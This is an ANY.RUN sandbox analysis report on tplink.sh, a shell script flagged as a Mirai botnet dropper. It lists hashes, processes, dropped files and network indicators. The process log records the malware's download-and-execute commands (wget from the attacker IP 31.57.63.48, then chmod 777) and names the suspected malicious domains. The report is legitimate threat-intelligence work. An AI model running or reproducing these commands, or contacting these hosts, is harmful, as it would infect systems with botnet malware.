File name: tplink.sh

Full analysis: https://app.any.run/tasks/b5f8ee4f-12e4-40d4-b9f4-5a5d8711f0cc
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: June 18, 2025, 07:10:56
OS: Ubuntu 22.04.2
Tags: auto, generic, mirai, botnet
MIME: text/plain
File info: ASCII text
MD5: 776392D802C5871D966E8C3FDEAD7E7C
SHA1: 1044336819BE1308F948FFCBC3A44769434F1174
SHA256: D5E7BDC898DBF6B1EF5E2040E0A083F76C60D62832586A236768ABDB561E9DA8
SSDEEP: 12:H7+50RrkxiuX8VjckGosQC5cFRfD5cUXRGD5cebAJ5cNixg5cRow95cYtg5cqIe:b20+xacxV6F9D6kRGD6XJ6Nim696YtgL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • GENERIC has been found (auto)

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41424)
      • wget (PID: 41416)
      • wget (PID: 41438)
    • MIRAI has been found (auto)

      • wget (PID: 41431)
    • Application was dropped or rewritten from another process

      • k4bd (deleted) (PID: 41444)
      • k4bd (deleted) (PID: 41447)
      • k4bd (deleted) (PID: 41446)
      • k4bd (deleted) (PID: 41442)
      • xle1 (PID: 41441)
      • k4bd (deleted) (PID: 41445)
  • SUSPICIOUS

    • Starts itself from another location

      • xle1 (PID: 41441)
    • Executes commands using command-line interpreter

      • sudo (PID: 41400)
      • bash (PID: 41402)
    • Uses wget to download content

      • bash (PID: 41402)
    • Modifies file or directory owner

      • sudo (PID: 41397)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 41402)
    • Connects to the server without a host name

      • wget (PID: 41404)
      • wget (PID: 41424)
      • wget (PID: 41416)
      • wget (PID: 41411)
      • wget (PID: 41448)
      • wget (PID: 41431)
      • wget (PID: 41438)
    • Potential Corporate Privacy Violation

      • wget (PID: 41416)
      • wget (PID: 41424)
      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41438)
      • wget (PID: 41431)
  • INFO

    • Checks timezone

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41416)
      • wget (PID: 41431)
      • wget (PID: 41438)
      • wget (PID: 41424)
      • wget (PID: 41448)
    • Creates file in the temporary folder

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41416)
      • wget (PID: 41424)
      • wget (PID: 41431)
      • wget (PID: 41438)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 220
Monitored processes: 89
Malicious processes: 9
Suspicious processes: 1

Behavior graph

dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs #GENERIC wget chmod no specs bash no specs rm no specs #GENERIC wget chmod no specs bash no specs rm no specs #GENERIC wget systemctl no specs systemctl no specs chmod no specs bash no specs rm no specs #GENERIC wget systemctl no specs systemctl no specs chmod no specs bash no specs rm no specs #MIRAI wget chmod no specs bash no specs rm no specs #GENERIC wget chmod no specs xle1 no specs k4bd (deleted) no specs rm no specs wget k4bd (deleted) no specs gnome-session-ctl no specs chmod no specs bash no specs k4bd (deleted) no specs k4bd (deleted) no specs rm no specs k4bd (deleted) no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs k4bd (deleted) no specs k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted)

Process information

PID: 41396
CMD: /bin/sh -c "sudo chown user /home/user/Desktop/tplink\.sh && chmod +x /home/user/Desktop/tplink\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/tplink\.sh "
Path: /usr/bin/dash
Parent process: UbvyYXL4x2mYa65Q
User: user
Integrity Level: UNKNOWN
Exit code: 256
Modules (Images):
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 41397
CMD: sudo chown user /home/user/Desktop/tplink.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
PID: 41398
CMD: chown user /home/user/Desktop/tplink.sh
Path: /usr/bin/chown
Parent process: sudo
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 41399
CMD: chmod +x /home/user/Desktop/tplink.sh
Path: /usr/bin/chmod
Parent process: dash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 41400
CMD: sudo -iu user /home/user/Desktop/tplink.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 256
Modules (Images):
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
PID: 41402
CMD: -bash --login -c \/home\/user\/Desktop\/tplink\.sh
Path: /usr/bin/bash
Parent process: sudo
User: user
Integrity Level: UNKNOWN
Exit code: 256
Modules (Images):
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 41403
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 41404
CMD: wget http://31.57.63.48/j/mle1
Path: /usr/bin/wget
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
PID: 41407
CMD: chmod 777 mle1
Path: /usr/bin/chmod
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
/usr/lib/x86_64-linux-gnu/libc.so.6
PID: 41408
CMD: -bash --login -c \/home\/user\/Desktop\/tplink\.sh
Path: /usr/bin/bash
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 32256

Executable files: 0
Suspicious files: 4
Text files: 0
Unknown types: 2

Dropped files

PID   | Process | Filename             | Type   | MD5 | SHA256
41404 | wget    | /tmp/mle1            | o      |     |
41411 | wget    | /tmp/mbe1            | o      |     |
41416 | wget    | /tmp/aale1           | binary |     |
41424 | wget    | /tmp/a5le1 (deleted) | o      |     |
41431 | wget    | /tmp/a7le1 (deleted) | binary |     |
41438 | wget    | /tmp/xle1            | binary |     |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 25
TCP/UDP connections: 17
DNS requests: 17
Threats: 8

HTTP requests

PID   | Process | Method | HTTP Code | IP                  | URL                                            | CN      | Type   | Size    | Reputation
      |         | GET    | 200       | 169.150.255.183:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted
      |         | GET    | 200       | 169.150.255.183:443 | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted
      |         | GET    | 204       | 185.125.190.96:80   | http://connectivity-check.ubuntu.com/          | unknown |        |         | whitelisted
      |         | GET    |           | 185.125.190.49:80   | http://connectivity-check.ubuntu.com/          | unknown |        |         | whitelisted
      |         | GET    |           | 185.125.190.49:80   | http://connectivity-check.ubuntu.com/          | unknown |        |         | whitelisted
      |         | GET    | 200       | 195.181.175.40:443  | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted
41404 | wget    | GET    | 200       | 31.57.63.48:80      | http://31.57.63.48/j/mle1                      | unknown |        |         |
      |         | POST   | 200       | 185.125.188.58:443  | https://api.snapcraft.io/v2/snaps/refresh      | unknown | binary | 45.5 Kb | whitelisted
      |         | GET    | 200       | 37.19.194.80:443    | https://odrs.gnome.org/1.0/reviews/api/ratings | unknown | binary | 1.49 Mb | whitelisted
      |         | POST   | 200       | 185.125.188.58:443  | https://api.snapcraft.io/v2/snaps/refresh      | unknown | binary | 45.5 Kb | whitelisted

Connections

PID   | Process      | IP                  | Domain           | ASN                     | CN | Reputation
      |              | 185.125.190.49:80   |                  | Canonical Group Limited | GB | unknown
484   | avahi-daemon | 224.0.0.251:5353    |                  |                         |    | unknown
      |              | 185.125.190.96:80   |                  | Canonical Group Limited | GB | unknown
      |              | 37.19.194.81:443    | odrs.gnome.org   | Datacamp Limited        | DE | whitelisted
      |              | 195.181.175.41:443  | odrs.gnome.org   | Datacamp Limited        | DE | whitelisted
41404 | wget         | 31.57.63.48:80      |                  | Aria Shatel Company Ltd | IR | unknown
512   | snapd        | 185.125.188.59:443  | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
41411 | wget         | 31.57.63.48:80      |                  | Aria Shatel Company Ltd | IR | unknown
41416 | wget         | 31.57.63.48:80      |                  | Aria Shatel Company Ltd | IR | unknown
512   | snapd        | 185.125.188.57:443  | api.snapcraft.io | Canonical Group Limited | GB | whitelisted

DNS requests

Domain
IP
Reputation
odrs.gnome.org
  • 37.19.194.81
  • 212.102.56.179
  • 195.181.175.41
  • 169.150.255.180
  • 207.211.211.27
  • 195.181.170.18
  • 169.150.255.184
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::19
whitelisted
google.com
  • 172.217.16.206
  • 2a00:1450:4001:830::200e
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.58
  • 185.125.188.57
  • 185.125.188.54
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
whitelisted
10.100.168.192.in-addr.arpa
unknown
3gipcam.com
unknown
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::198
  • 2001:67c:1562::24
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::197
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::2b
  • 2001:67c:1562::23
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::98
whitelisted
furry-femboys.top
unknown
twinkfinder.nl
unknown
cross-compiling.org
unknown
i-kiss-boys.com
unknown

Threats

PID | Process | Class                                 | Message
    |         | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
    |         | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
    |         | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
    |         | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
    |         | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
    |         | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
    |         | Potentially Bad Traffic               | ET DNS Query to a *.top domain - Likely Hostile
    |         | Potentially Bad Traffic               | ET DNS Query to a *.top domain - Likely Hostile
No debug info